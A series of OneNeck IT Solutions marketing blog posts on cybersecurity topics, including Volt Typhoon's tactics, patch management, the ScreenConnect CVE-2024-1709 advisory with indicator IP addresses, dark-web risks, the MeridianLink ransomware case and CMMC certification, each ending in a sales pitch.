Cybersecurity remains at the forefront of national security concerns, especially with state-sponsored cyber activities targeting critical infrastructure. Recent advisories from the Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with the National Security Agency (NSA) and the FBI have brought to light the activities of People’s Republic of China state-sponsored actors, notably referred to as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus). These cyber criminals, whose latest attack was identified in May 2023, are strategically positioning themselves within IT networks of U.S. critical infrastructure sectors, including—Communications, Energy, Transportation Systems, Water and Wastewater Systems—to potentially launch a disruptive or destructive cyber attack.

The Dangers Presented by Volt Typhoon’s Cyber Attack

Volt Typhoon’s most recent strategy highlights the sophisticated use of “living off the land” (LOTL) techniques. This method involves leveraging legitimate features of a system to remain undetected while conducting malicious activities. Specifically, the actors engage in detailed reconnaissance, exploiting vulnerabilities in public-facing network appliances for initial access, and then they leverage administrator credentials for lateral movement and domain control. The result is a combined strategic and stealth approach. These tactics signify a departure from traditional cyber-based espionage, hinting at a more ominous intent of pre-positioning for future activities.

Tactics and Techniques Utilized by Volt Typhoon:

• Establish initial access through vulnerabilities in network appliances, followed by VPN use.
• Obtain administrator credentials, often via privilege escalation or insecure storage.
• Use lateral movement to domain controllers using valid credentials and Remote Desktop Protocol.
• Discover and utilize PowerShell for targeted queries on Windows event logs via stealth networks.
• Use the Volume Shadow Copy Service to achieve full domain compromise by accessing the Active Directory database (NTDS.dit).
• Employ offline password-cracking techniques to gain elevated network access.
• Strategic infiltration focuses on OT assets and tests access with default vendor or compromised OT system credentials.
• Creates the potential for significant disruption, including manipulating HVAC systems or critical energy and water controls.

For a more detailed overview, visit the CISA Cybersecurity Advisory website.

Strategic Implications and Recommendations

The revelation of Volt Typhoon’s activities should serve as a wake-up call for bolstering security measures across critical infrastructure sectors. Additionally, these attacks underscore the importance of adopting a proactive and strategic approach to security, emphasizing resilience and the capacity to deter sophisticated threats.

Key recommendations for mitigating the risk posed by Volt Typhoon include:

• Patching of Internet-facing Systems: Regularly update and patch Internet-facing systems, prioritizing critical vulnerabilities known to be exploited by Volt Typhoon. This patch management reduces the attack surface and protects against known exploits.
• Phishing-resistant Multifactor Authentication (MFA): Deploy phishing-resistant MFA to safeguard access to networks and sensitive information. This process adds a crucial layer of security that attackers using stolen credentials cannot easily bypass.
• Conditional Access Policies: Implement conditional access policies that evaluate the context of access requests (user identity, location, device security status, etc.) and apply appropriate security controls. This access restriction helps minimize risks by ensuring only legitimate, authenticated, and authorized access to critical resources.
• Comprehensive Logging and Monitoring: Implement an extensive logging and monitoring regime. Ensure all application, access, and security logs are collected and analyzed in detail, focusing on detecting subtle, sophisticated tactics like those employed by Volt Typhoon, including LOTL techniques.
• Technology Lifecycle Management: Develop a strategy for managing the end-of-life of technology the manufacturer no longer supports. Update or replace outdated systems to close vulnerabilities that attackers could exploit.

Weathering the Typhoon of a Cyber Attack with a Trusted Partner

The activities of Volt Typhoon highlight the evolving threat landscape and the need for constant vigilance and adaptation in cybersecurity practices. By understanding and monitoring the tactics and strategies employed by these bad actors, cybersecurity professionals can better protect both their organization’s valuable data and critical infrastructure from potential threats. This requires technological solutions and a strategic mindset that anticipates and mitigates against the sophisticated methods utilized.

However, the complexity, sophistication, and sheer volume of these threats often surpass the capabilities of in-house IT staff. This gap is where teaming with a reliable security partner becomes paramount. A seasoned security partner brings expertise, advanced technology solutions, and a proactive approach to identifying and mitigating threats, offering a comprehensive strategy that extends beyond traditional measures. This expertise ensures organizations can defend against complex attacks and stay ahead of potential vulnerabilities.

OneNeck IT Solutions offers a strategic advantage in response to such threats. Our experienced team provides a broad range of security services designed to protect against sophisticated cyber threats. Our security solutions, including cloud, managed, and professional services, help ensure a robust defense against a cyber attack from actors like Volt Typhoon.

Partnering with OneNeck is the perfect next step for organizations looking to enhance their security posture. Contact us today to learn more about how our services can protect your organization from sophisticated cyber threats.

For much of my adult life, I’ve been surrounded by family and friends who are dentists and orthodontists. I’ve seen first-hand the demanding time commitment required to care for patients while still trying to maintain staffing, run a dental practice, and manage an oral care business. It’s all-consuming, and while the focus is on keeping smiles bright and healthy, there’s an unseen menace that’s not so easily brushed away: cyber threats.

It’s a tricky situation; dentists, orthodontists, and their office managers are experts at filling cavities, not firewall vulnerabilities. And who can blame them? When juggling appointments, patient care, and the daily operations of a dental office, there’s barely enough time to floss, let alone fend off cybercriminals.

However, as the digital age continues to evolve rapidly, so does the sophistication of cyber threats, making it crucial for dental practices to prioritize cybersecurity. Unfortunately, as with the broader healthcare industry, the dental industry is far from immune to these attacks. Recently, we’ve seen the unprecedented impacts of ransomware attacks on Change Healthcare (the technical arm of United Healthcare), and there have been several instances targeting dental offices as well, resulting in significant financial losses and the compromise of sensitive patient information. Such breaches damage the trust patients place in their healthcare providers and can come with hefty fines and legal ramifications.

Rooting Out Risk: Cybersecurity Hygiene for Dental Professionals

So, how can dental and orthodontic practices brace themselves against these threats? Here are 3 must-dos to keep your practice’s digital hygiene in tip-top shape:

Regular Check-Ups to Discover Cyber Threats

Just as regular dental check-ups prevent minor issues from becoming major problems, regular cybersecurity assessments can help identify vulnerabilities before exploitation. This prevention includes keeping all software up to date with regular patching, conducting periodic security training for all staff to know what to be on alert for, and implementing strong password policies to protect access to critical applications, data and systems.

Seal the Gaps in Your Defenses

Ensure that all patient data is encrypted and securely backed up. Consider it the digital equivalent of enamel to prevent decay. Encryption acts as a barrier, making it difficult for unauthorized individuals to access sensitive information.

As fluoride treatment provides additional protection on top of enamel, so does multi-factor authentication (MFA). So, even if a staff member’s password is compromised, MFA protects unauthorized data and account access.

Don’t Go It Alone Against Cyber Threats

Dental practices should consider partnering with cybersecurity experts to safeguard their operations, just as patients turn to dental professionals for their expertise. OneNeck IT Solutions offers a robust portfolio of security consulting services, managed services, and resale solutions tailored to dental practices’ unique needs. Our team understands the challenges you face and is equipped to handle the technicalities of cybersecurity, allowing you to focus on what you do best: caring for your patients.

Recommended by 9 out of 10 Security Professionals

In an industry where trust is paramount, ensuring the security of patient data is not just about regulatory compliance; it’s about maintaining the confidence and loyalty of those you serve. In today’s battle against cyber threats, it’s imperative to have a strong defense to lessen the likelihood of a painful recovery. Think of OneNeck IT Solutions as your practice’s cybersecurity orthodontist, here to straighten out your digital defense and keep your practice’s data as healthy as the smiles you create.

Remember, while the world of cybersecurity may seem daunting, you’re not alone. By taking proactive steps and partnering with the experienced professionals, your practice can bite back against cyber threats. Just like preventive dentistry, early detection and treatment can save you from more painful procedures down the line.

Contact us today to craft a custom security plan that keeps your data safe, secure, and shining brightly.

When it comes to IT security, it’s nearly impossible to overstate patch management’s significance. It’s a pivotal process that, if disregarded, often leads to dire consequences. The intricate nature of today’s IT ecosystems, with their vast networks and complex software interdependencies, presents a challenging landscape. This complexity necessitates a strategic, well-informed approach to navigating the patch management labyrinth, ensuring the integrity and security of critical technical infrastructures.

Consequences of a Breach

The 2017 Equifax breach should stand as a stark reminder of the vulnerabilities inherent in neglecting patch management. This breach, one of the largest in history, exposed the sensitive personal information of approximately 147 million U.S. consumers, including names, Social Security numbers, and dates of birth. The attack’s success was attributed to exploiting a known vulnerability that simply wasn’t patched in a timely manner.

The fallout from this incident was immense, leading to widespread criticism of Equifax’s data security practices and the eventual settlement with the Consumer Financial Protection Bureau (CFPB), the Federal Trade Commission (FTC), and 48 states, amounting to nearly $700 million in monetary relief and penalties. This breach underscores the ever-evolving cybersecurity threats confronting private and government entities and highlights the critical need for stringent patching practices​​​​.

Embracing Patch Management Services

Patching is a never-ending journey where IT teams can easily fall behind; however, embracing managed services offers a more tenable long-term option. These services, adhering to stringent security frameworks such as NIST 800-171 or CIS Controls, provide dedicated resources necessary for the efficient and timely application of patches. This approach aids organizations in maintaining compliance with changing regulations and strengthens defenses against cyber threats.

Managed services providers offer a dual advantage:

• Free Up Internal Resources: Allows organizations to reallocate their internal resources towards core business operations, enhancing productivity and focus.
• Access to Cybersecurity Expertise: Provides organizations with the latest cybersecurity expertise, keeping pace with evolving threats and technologies and ensuring a proactive defense mechanism.

By leveraging the knowledge and capabilities of managed service providers, organizations can navigate the patch management labyrinth with greater confidence and efficiency, ensuring a more robust security posture.

Risk and Response

Vulnerability scanning and security assessments play complementary yet distinct roles in the patch management process. Continuous vulnerability scanning is critical for identifying software that requires updates or may be associated with known bugs or vulnerabilities. On the other hand, risk assessments are conducted periodically to inform the policies and procedures that influence an organization’s vulnerability management efforts. While these assessments provide strategic direction and help ensure that patching practices are standardized and effective, it’s important to note that patching activities can proceed independently of risk assessments. When properly combined, these activities lay a solid foundation for developing and maintaining robust mitigation strategies.

Ultimately, the value of these assessments lies in identifying holes in vulnerability management policy and procedure, thus creating a catalyst for the necessary remediation to close those gaps. Interpreting the results requires a deep understanding of the organization’s risk profile and the potential impact of each vulnerability. This interpretation is where frameworks like CIS Controls prove invaluable, guiding organizations systematically to manage technical vulnerabilities effectively. Adhering to such standards ensures that the insights gained from assessments lead to actionable, prioritized steps that enhance the organization’s overall security posture.

Organizations can create a proactive defense mechanism by regularly assessing their security policies and procedures, thus directing the vulnerability scanning and patch management processes. This strategic approach addresses current vulnerabilities and sets the stage for a more resilient and secure IT infrastructure.

Lessons from the Field

The hacking of SolarWinds serves as a stark reminder of the critical importance of integrity and thoroughness in the patch management process. In this breach, attackers compromised the software development or update mechanism used by SolarWinds, a company that produces network management software widely used across government and private sectors. The attackers inserted malicious code into the company’s Orion software updates, which, once deployed, created a backdoor for the attackers into the victim’s IT environment.

The significance of this incident lies not only in its scale but also in the method of attack. It illustrates that the security process is as vital as the application of the patches. In this instance, attackers exploited organizations’ trust in their software vendors and the updates they provide. This breach underscores organizations’ need to apply patches promptly and verify the integrity and security of the patches themselves, along with the mechanisms used to deliver and install them.

Consultative Approach to Patch Management

The effectiveness of patch management critically hinges on a consultative approach. With the complex landscape of cybersecurity threats evolving rapidly, consulting services offer the expertise needed to navigate these challenges efficiently. Adopting a consultative approach to patch management not only streamlines the process of addressing vulnerabilities but also fortifies an organization’s defenses against future cybersecurity threats.

• Expert Guidance: Provide specialized knowledge to help organizations sift through complex vulnerability reports, ensuring a clear understanding of the threat landscape.
• Prioritization of Patches: Identify and prioritize patches crucial for maintaining operational security and compliance, focusing efforts where they are most needed.
• Proactive Vulnerability Management: Advocate for continuous monitoring and early threat detection per cybersecurity frameworks like CIS.
• Constant Vigilance: Encourage a culture of vigilance and ongoing assessment within organizations, promoting a thorough and integrity-focused patching process.

A Patch Management Partnership: Crafting a Secure Future

The journey through the patch management landscape is more than just a technical endeavor; it demands a strategic mindset that embraces continuous improvement and an understanding of the broader cybersecurity environment. Patch management requires a holistic strategy encompassing multiple facets of cybersecurity. This comprehensive approach integrates managed services to offload and streamline patch applications, employs detailed security assessments to uncover vulnerabilities, and follows the principles laid out by established security frameworks.

This path, though demanding, paves the way to a secure and robust digital future, safeguarding the organization’s assets and data against potential breaches. OneNeck is here to help with an experienced team that provides tailored solutions for patching and any other aspect of systems management your organization may need. Our extensive expertise across multiple platforms and industries allows us to deliver a right-fit solution for you.

Contact us today to speak with a member of our team.

***Check out our Monthly Patching Blog series to keep up-to-date on the latest critical updates from our vendors. ***

A critical vulnerability has been uncovered in ConnectWise’s ScreenConnect. Identified under CVE-2024-1709, this susceptibility poses a significant threat, prompting immediate and decisive action to safeguard sensitive information and maintain operational integrity.

Importantly, for our clients and partners, OneNeck has not been impacted by this vulnerability. However, we recognize the importance of staying informed on all potential security threats and providing guidance on mitigation strategies to our partners and customers.

A Closer Look at the ScreenConnect Vulnerability

Initially reported on February 13, 2024, through ConnectWise’s vulnerability disclosure channel, the exposures demand immediate action from on-premise customers. These security risks involve:

• CWE-288: Authentication bypass using an alternate path or channel
• CWE-22: Improper limitation of a pathname to a restricted directory (“path traversal”)

Both vulnerabilities highlight the need for stringent security measures. The CVSS score stands at a critical 10 for CWE-288, underlining the severity of the threat. This score is calculated based on several metrics, indicating that the vulnerability is easily exploitable and the potentially high impact on confidentiality, integrity, and availability that could result. 

Indicators of Compromise

The following IP addresses have been identified by ConnectWise as being used by threat actors and are provided below for your protection and defense.

IOCs:

155.133.5.15

155.133.5.14

118.69.65.60

ConnectWise’s Response and Remediation Steps

ConnectWise promptly issued a security bulletin outlining remediation steps after discovering the vulnerability. Cloud customers, including those using “screenconnect.com” and “hostedrmm.com,” were automatically secured against these vulnerabilities as of February 19, requiring no additional actions on their part.

On-prem users, on the other hand, are urged to update to the latest ScreenConnect version, 23.9.10.8817, immediately to protect against these threats, with version 23.9.8 being the minimum requirement to mitigate the reported vulnerabilities. Notably, ConnectWise has lifted license restrictions to ensure all customers, even those not currently under maintenance, can upgrade to the latest version.

• For instructions on updating to the newest release, please reference this document.
• Link to patch: Download

Immediate Steps for ScreenConnect Users

The identification of CVE-2024-1709 necessitates immediate action from ConnectWise partners. As mentioned above for cloud users, remediation has been automatically applied, ensuring security without further steps needed, though continued monitoring of your environment is highly recommended. For on-premises users, updating your systems is critical. Upgrading to the latest ScreenConnect version is not just recommended; it’s essential for safeguarding against potential exploitation.

Best Practices and a Partner That Has Your Back

The discovery of this issue serves as a valuable lesson for all organizations in the importance of timely updates and the implementation of a robust cybersecurity framework.

Key recommendations include:

• Regularly updating and patching software to mitigate vulnerabilities.
• Monitoring systems for indicators of compromise to detect and respond to threats promptly.
• Educating stakeholders about the importance of cybersecurity hygiene.

At OneNeck, the security of our customers is our top priority. We are dedicated to informing our customers about potential security threats, regardless of whether we directly manage those services. Our commitment extends beyond mere awareness; we actively provide support and guidance to ensure our customers can navigate the cybersecurity landscape confidently. Should you need assistance or have concerns about your security posture, our Customer Support Center is ready to help.

As we step into Data Privacy Week, we should reflect on the importance of protecting data throughout an organization and at an individual level. In a time when digital transformation is rapidly advancing, data privacy challenges have become more complex and demanding. This week is a timely reminder of the continuous efforts needed to safeguard sensitive information in our hyper-connected world.

The acceleration of digital integration into our daily lives and businesses brings countless potential vulnerabilities. Addressing data privacy vulnerabilities requires a shift in mindset and advanced technical solutions approach.

Emphasizing Security Awareness Training: Empower Your Workforce

A knowledgeable and vigilant workforce is a critical defense mechanism against cyber threats, and building this first line of defense is a multifaceted endeavor. Cyber threats constantly shift, necessitating regular training to keep the workforce aware of the latest risks, threats and defense mechanisms. Continuous education is crucial in building a proactive culture of security. It ensures employees are not just aware but are also actively participating in safeguarding organizational data.

Engagement is the key to retention, and this is where interactive training platforms come into play. By employing simulated attacks, interactive learning modules, and incorporating real-world scenarios, the training process becomes more than just a routine exercise. It becomes an immersive experience, significantly enhancing the understanding and retention of cybersecurity best practices. This approach ensures the principles of cybersecurity are not just learned in theory but are ingrained in the everyday behavior and mindset of the workforce.

Robust Data Access Controls: A Strategic Necessity for Data Privacy

One of the most critical yet often overlooked cybersecurity areas is managing internal access to data. Robust data access controls are not just an add-on but a strategic necessity. How data is accessed and handled internally can have significant impact on an organization’s vulnerability to security breaches.

These controls serve as the foundation of a comprehensive cybersecurity strategy, ensuring sensitive information is accessed responsibly and securely. The goal of course, is preventing unauthorized external access and accurately manage how internal users interact with, share, and utilize data.

• Customized Access Rights – Tailoring access controls to employees’ specific needs and roles is essential in minimizing unnecessary data exposure. This customization ensures that employees have access to the data they need for their roles and no more, thereby reducing the risk of internal data breaches.
• Automated Solutions – With the complexity of modern network environments, manually managing access rights is no longer viable. Automated tools are crucial for the efficient management and monitoring of access rights, ensuring that the right people have the proper access at the correct times and that access is revoked when no longer needed. These systems play a role in identifying and responding to unauthorized access attempts, enhancing overall data security.

If it’s been a while (or not yet happened) since your Microsoft Active Directory or Entra ID environment was reviewed and optimized, OneNeck’s expert Microsoft security consultants can quickly and easily engage to ensure your automated tools are helping (rather than hindering) your security efforts.

The Power of Segmentation: Isolating Risks

Network segmentation involves creating distinct barriers within a network, effectively separating different areas to isolate risks and prevent breakouts. Organizations can significantly mitigate the impact of potential breaches by dividing the network into distinct zones, each with its own unique types of data and access levels.

When networks are segmented, a breach in one area is contained, preventing it from spreading across the entire network. This isolation is particularly beneficial in large organizations, where the diversity and volume of data can vary significantly across different departments. By segmenting these areas, organizations can apply tailored security measures appropriate for the sensitivity of the data contained within each segment.

This approach also aids organizations in meeting various compliance requirements. With data privacy regulations (such as General Data Protection Regulation, GDPR) becoming increasingly stringent, demonstrating effective data management is crucial. Network segmentation simplifies this process by clearly defining data boundaries. When data is segmented and categorized, applying specific regulatory standards to each data type becomes easier, streamlining the compliance process. This clear delineation of data not only aids in compliance but also enhances overall security management, making it easier for organizations to identify and rectify any potential vulnerabilities within specific segments.

Reinforcing Data Privacy Defenses

As cyber threats become more sophisticated, multi-layered security systems are imperative. Advanced firewalls, Intrusion Prevention Systems (IPS), Intrusion Detection Systems (IDS), and comprehensive antivirus solutions are among these critical defenses. These components work together to create a formidable barrier against a wide range of threats.

• Next Generation Firewalls – The role of firewalls in cybersecurity cannot be overstated. Next-generation firewalls go beyond traditional packet filtering, offering deeper inspection and control of network traffic. These firewalls analyze traffic for malicious activities and apply rules that go far beyond IP addresses and ports, offering a more nuanced defense against sophisticated attacks.
• Real-time Threat Detection – Intrusion Prevention Systems (IPS) and Intrusion Detection Systems (IDS) provide real-time monitoring and immediate response to unusual activities traversing a firewall with such capabilities. These systems are essential for identifying potential threats as they occur, allowing for quick countermeasures to prevent or minimize damage.
• Comprehensive Antivirus Solutions – Antivirus software remains a fundamental element of cybersecurity defense. However, these programs must be comprehensive, regularly updated, and capable of dealing with the latest malware and virus threats. Modern antivirus solutions should protect against known viruses and offer heuristic analysis to detect new, unknown threats.

A Data Privacy Partner You Can Rely On

While Data Privacy Week serves as a crucial reminder of the ongoing importance of protecting data, it’s vital to recognize that the principles and strategies discussed are not just for a single week but are part of a continuous effort. Let it catalyze ongoing education, strategy enhancement, and technological advancement in data security. As we step beyond this observance week, let’s all embrace the responsibility of ensuring data privacy as a fundamental aspect of our digital existence, demonstrating organizational and individual commitments to safeguarding our most valuable digital assets daily.

 At OneNeck, we take a holistic approach to data privacy. We provide a broad selection of services and solution packages tailored to the specific needs of our customers. Are you in need of a partner to help administer your security demands? We’ve got your back with our comprehensive managed services suites.

Contact us today to see how we can be your data protection partner.

In the vastness of the internet exists a somewhat mysterious shadowy corner known as the dark web. Though often misunderstood, this concealed segment of the web poses significant risks to personal and corporate data security. As per a recent report, in 2023, roughly 2.7 million users accessed the dark web daily, many with nefarious intent, while others are simply searching for anonymity but often encountering much more than they bargained for.

Distinct from the ‘surface web’ – the part of the internet we frequently use – and the ‘deep web,’ which contains protected information like medical records and financial data, the dark web is intentionally hidden and inaccessible through standard search engines and browsers. Access requires specific software and configurations, thus creating an environment where users can remain anonymous and untraceable.

The Allure and Perils of the Dark Web

The dark web presents tantalizing but dangerous options for those accessing it. Its allure lies not just in the obscurity it offers but in the promise of freedom from oversight. This shadowy network attracts diverse users: privacy advocates seeking refuge from surveillance, journalists sharing sensitive information under the cloak of anonymity, and, unfortunately, individuals engaging in illegal activities.

However, the characteristics that make the dark web appealing also render it dangerous. This hidden corner of the internet has become a hotspot for a range of cybercriminal activities. The anonymity and lack of regulation facilitate and embolden these illicit transactions. It has been estimated that 75% of Dark Web sites are marketplaces. Another study suggests that anywhere from 2% to 5% of the global GDP is laundered on the dark web.

The dark web serves as a breeding ground for security threats, providing a hub for black-market transactions and a haven for hackers and cybercriminals. In 2021 alone, ransomware attacks were recorded every 11 seconds, causing damages upwards of $20 billion. This stark reality highlights the critical need for robust cybersecurity measures. The sale of personal and corporate data, hacking tools, and ransomware kits is rampant. As technology advances, so do the tactics and tools employed in the dark web’s shadowy corridors, making it a moving target for law enforcement and cybersecurity experts.

Corporate Data in the Crosshairs

Emerging as a distinct threat to corporate data, the dark web poses a substantial risk to the integrity and security of global businesses. Kaspersky’s research highlights this issue’s gravity, revealing an average of over 1,700 posts monthly related to the sale, purchase, or distribution of corporate databases and documents. This alarming trend includes a range of sensitive information, from confidential business strategies to private customer details, which, in the wrong hands, can lead to disastrous consequences, including identity theft, compliance failures, financial fraud, and severe reputational damage to the companies involved.

The trafficking of corporate data on the dark web has far-reaching implications that extend well beyond a breached organization. When sensitive personal data falls into the wrong hands, it can lead to a cascade of privacy violations affecting countless individuals. Customers and employees find their personal information, financial details, and identities at risk of being exploited.

Businesses bear a crucial responsibility, not just to their bottom line, but to their customers, clients, and partners, and must enact robust cybersecurity measures. This obligation includes deploying advanced security technologies, conducting thorough employee training and awareness programs, executing regular security audits, and constant preparedness via effective incident response plans. By doing so, they preserve their interests and protect the personal and financial well-being of their clients and partners from the ripple effects of data breaches.

Safeguarding Against Dark Web Dangers

While challenging, there are effective strategies and policies that organizations can deploy to help defend against the multifaceted threats of the dark web. Comprehensive protection requires a solid security foundation and an agile and dynamic approach. Some basic principles to safeguard against dark web dangers include:

• Establish robust password protocols – Craft intricate and unique passwords for each account to minimize unauthorized breaches.
• Enable Multi-Factor Authentication (MFA) – Implement additional verification steps to access accounts, significantly enhancing security against unauthorized access and breaches.
• Stay current with software updates – Regular updates can prevent the exploitation of system vulnerabilities.
• Prioritize cybersecurity education – Equip employees with the knowledge and practices to act as the first line of defense against cyber intrusions.

Cybercriminals continuously develop new tactics, and companies must respond by adopting a holistic approach. This approach includes strengthening security by employing advanced security measures such as encryption, firewalls, and intrusion detection systems and regularly conducting security audits to identify and address vulnerabilities.

Furthermore, developing a robust incident response plan is essential for minimizing damage during a data breach. This plan should include protocols for immediate action, communication strategies, and recovery processes.

A Partner to Help Light the Way

The challenges posed by the dark web are daunting but not insurmountable. OneNeck is here to guide you with robust cybersecurity solutions tailored to protect your personal and corporate data. Don’t wait until threats become breaches; act now.

Contact our security experts today for a Security Awareness Call and start fortifying your defenses against the ever-evolving digital threats of the dark web.

In a unique twist of events in the cybersecurity world, a ransomware attacker has crossed into uncharted territory. Exploiting a new legal loophole, they reported their victim, digital lending technology vendor MeridianLink, to the U.S. Securities and Exchange Commission (SEC) for failing to promptly disclose a breach. This case marks a significant evolution in ransomware tactics. It highlights the crucial intersection of cybersecurity, legal compliance, and corporate responsibility.

The Ransomware Attack on MeridianLink

The ransomware attacker, a group known as Alphv/BlackCat, claims to have infiltrated MeridianLink’s network on November 7th, 2023, resulting in the theft of significant amounts of customer data and operational information. While MeridianLink confirmed the cybersecurity incident, the exact timeline of the breach’s discovery and reporting remains unclear. The company claims that the attack occurred on November 10^th and that the threat was quickly nullified.

MeridianLink’s official statement on the incident: “Upon discovery on the same day, we acted immediately to contain the threat and engaged a team of third-party experts to investigate the incident. Based on our investigation to date, we have identified no evidence of unauthorized access to our production platforms, and the incident has caused minimal business interruption.” The company also added that it cannot share further details due to its ongoing investigation.

Why the SEC Complaint

Since July 26th, 2023, the SEC has mandated that public companies disclose significant cyber incidents within four days. These rules went into effect in September. However, it is worth noting that the disclosure requirement takes effect on December 18th for large organizations, while smaller companies have a deadline of June 2024.

Regardless of specific dates, the intent here is clear; –add another layer of pressure on cyberattack victims to give in to the demands of their attackers and pay the requested ransoms. By filing such complaints, companies now face the possibility of bad publicity, erosion of client trust, and financial losses, as well as potential compliance and legal ramifications.

Implications for Cybersecurity and Compliance

While a cyber assailant filing a complaint to a governmental organization for an attack they are responsible for may seem a bit like an arsonist reporting a fire, this incident underscores how cybercrime is constantly evolving. Now, attackers are even leveraging legal and regulatory frameworks to their advantage. This development is a stark reminder for businesses to fortify their security defenses and remain transparent and prompt in their breach disclosure practices.

Cybersecurity and Resilience

Ultimately this incident underscores a critical lesson for all organizations: the importance of having effective cybersecurity measures and being resilient in the face of a successful attack. Further highlighted is the evolving nature of cyber threats and the need for a comprehensive cybersecurity approach that encompasses prevention and response strategies.

So, what are businesses supposed to do to meet evolving threats? Here are some key points to consider for organizations aiming to bolster cybersecurity defenses:

Proactive Cybersecurity Measures

• Regular Risk Assessments – Organizations can stay ahead of emerging threats and vulnerabilities by continuously evaluating cybersecurity risks.
• Advanced Threat Detection – Leveraging cutting-edge technologies to detect threats early is crucial in a landscape where attack methods constantly evolve.
• Employee Training and Awareness – Human error can be a significant vulnerability, empowering employees with knowledge and best practices is vital.
• Robust Data Encryption – Encrypting sensitive data is a fundamental security practice that ensures data integrity, even in the event of unauthorized access.
• Multi-Factor Authentication (MFA) – MFA is a critical layer in defense strategies, adding depth to access controls and reducing the risk of unauthorized entry.

Bridging Defense and Recovery

While proactive measures serve as the first line of defense, laying the groundwork for prevention, an organization’s resilience strategies are the contingency plans that take over when defenses are breached. This dynamic transition is crucial for maintaining operational continuity and upholding stakeholder trust through adversity.

A comprehensive cybersecurity approach embodies this transition, ensuring that threat prevention vigilance is complemented by incident response robustness. It guarantees that organizations not only deter potential breaches but bounce back with speed and efficiency, safeguarding their operational integrity when breached.

 Resilience in the Face of an Ransomware Attacks

• Incident Response Plan – A clear and actionable incident response plan is vital for quick and effective action in a breach.
• Rapid Response Team – A dedicated team ready to tackle cybersecurity incidents, with defined roles and responsibilities, is essential for minimizing damage and restoring operations swiftly.
• Communication Strategy – Effective communication during and after an incident is crucial for maintaining stakeholder trust and managing reputational risks.
• Legal and Regulatory Compliance – Understanding and adhering to legal and regulatory requirements ensures an organization’s response is effective and compliant.
• Backup and Recovery Procedures – Regular backups and robust recovery processes are the safety nets that ensure business continuity in the face of cyber adversity.

From Compliance to Confidence with OneNeck

The MeridianLink ransomware attack, coupled with the regulatory maneuverings of the attackers, exemplifies the dual threats of modern cybersecurity: technical and compliance. OneNeck is well-versed in the dynamics of both cyber threats and compliance landscapes. Our suite of cybersecurity solutions is designed to address these challenging fronts head-on.

Contact us today to fortify defenses and align your cybersecurity strategies with today’s demands. Together, we can ensure that your organization is secure, compliant, and, above all, resilient in the face of any threat.

Cybersecurity Maturity Model Certification (CMMC) is a security framework created by the U.S. Department of Defense (DoD) to ensure companies prove their information security protocols are robust and mature enough to protect sensitive DoD data known as Controlled Unclassified Information (CUI). Understanding this framework and achieving organizational certification is an important step to winning deals and contracts.

Introduction to CMMC

What does CMMC mean?

The acronym CMMC stands for Cybersecurity Maturity Model Certification. By tying together several leading cybersecurity standards into five maturity levels ranging from basic to advanced, the CMMC program provides a verifiable roadmap for improving your organization’s security posture. To get certified, your organization must meet the criteria of at least the first level of certification.

Purpose and Goals of CMMC Certification

The goal of the CMMC certification is to deter uncontrolled access and possible misuse of crucial defense industry information residing outside the controlled federal systems. It intends to offer greater assurance to DoD that a contractor can adequately protect sensitive unclassified information at a level commensurate with your risk. Obtaining your certification establishes your firm as a reliable, diligent entity committed to cybersecurity.

CMMC Maturity Levels

CMMC 2.0—the most recent iteration of the model—has three levels of maturity that are applicable depending on the kind of information your company stores and the type of work it does. Each has its own list of requirements that build upon the level before it.

Level 1

At this initial stage, the focus is on implementing basic security measures. It includes 17 different practices that ensure companies are protecting Federal Contract Information (FCI).

Level 2

To achieve the second level, organizations must meet another 48 safeguards by embracing universally accepted best practices while incorporating relevant protective measures on Controlled Unclassified Information (CUI).

Level 3

Level 3 maturity means a company has good cyber hygiene or the satisfactory application of all NIST SP 800-171 Rev.1 guidelines along with an additional seven other controls totaling up to a sum of 130 required practices.

Preparation Steps for Cybersecurity Maturity Model Certification

So, what does it take to get you prepared to be CMMC certified? Working towards your Cybersecurity Maturity Model Certification (CMMC) will be much easier if you follow these pivotal steps to ensure you have all your ducks in a row.

1.   Determine Your CMMC Level and Scope

Determining the appropriate CMMC level for certification involves a careful assessment of your organization’s specific circumstances, cybersecurity risks and the requirements of your contracts or projects with the DoD. Review your DoD contracts and project specifications to understand what level you need and what its requirements are. From there, determine the types of data and assets your organization will handle or have access to during DoD projects.

2.   Run a Cybersecurity Practices Gap Analysis

Test current cybersecurity measures against the standard CMMC framework using a gap analysis template or similar digital tool. Pinpoint unmet practices or processes across domains like access control, asset management and incident response. Document the gaps and discuss the actions that must be taken to address them.

3.   Build a System Security Plan

A system security plan (SSP) is effectively a high-level blueprint of your program where you clearly outline how cyber safeguards are implemented universe-wide in compliance with defined CMMC 2.0 requirements. You likely already have one in place — the next step is to update it with the information you uncovered in step two. If you don’t already have an SSP, you’ll need to build one.

4.   Engage a Trusted Partner

Engaging a trusted partner can spell the difference between a smooth certification and one with lots of avoidable pitfalls. Selecting a trusted CMMC third-party assessment organization (C3PAO) familiar with both best practices and potential loopholes within your specific industry sector makes sense. This partner-ally can run cybersecurity assessments, gap analyses and ensure you and your team fully understand the expectations and requirements of certification.

The Support You Need to Get Certified

OneNeck’s security assessments are executed by a team of experts who stay on top of evolving threats, changing regulations and best practices. We help you cover all the bases so you can understand your current state, see how it measures up against the CMMC framework and take the necessary steps to get certified.

Contact us for a security assessment consultation.

The threat of cyber breaches looms larger than ever before. These incidents are not just occasional blips; they have become a persistent part of online existence. Last year, there were over 1800 reported breaches affected over 400 million people, with no signs of slowing down. This reality underscores the critical need for robust preparedness and comprehensive knowledge of cybersecurity practices. Every day presents new challenges and potential threats, making it imperative for organizations to stay vigilant and proactive in their defense strategies. It’s not about if a breach will happen, but when—and how well you can respond and recover.

The Power of Preparation: Incident Response Plans

Imagine the moment you detect a breach. Your immediate instinct might be panic, but with a robust Incident Response Plan, you can ensure a swift and organized response.

Isolating affected systems is one of the first and most crucial steps. This action helps to prevent the further spread of malware or potential data leaks. It’s akin to stopping a water leak before flooding your house. You can minimize the damage and start the recovery process by acting swiftly.

But an IRP isn’t just about immediate actions. It also covers assessing the breach’s impact, communication strategies, and post-incident reviews. It’s a comprehensive approach that looks at the incident from all angles, ensuring nothing is overlooked.

Preparation truly is the key. In the face of a cyber incident, having a plan ready to activate can be the difference between a minor hiccup and a major catastrophe. It’s the difference between feeling lost and having a clear direction. In cybersecurity, where every second counts, an Incident Response Plan is your best ally.

Maintaining Trust: The Role of Communication in Cyber Incidents

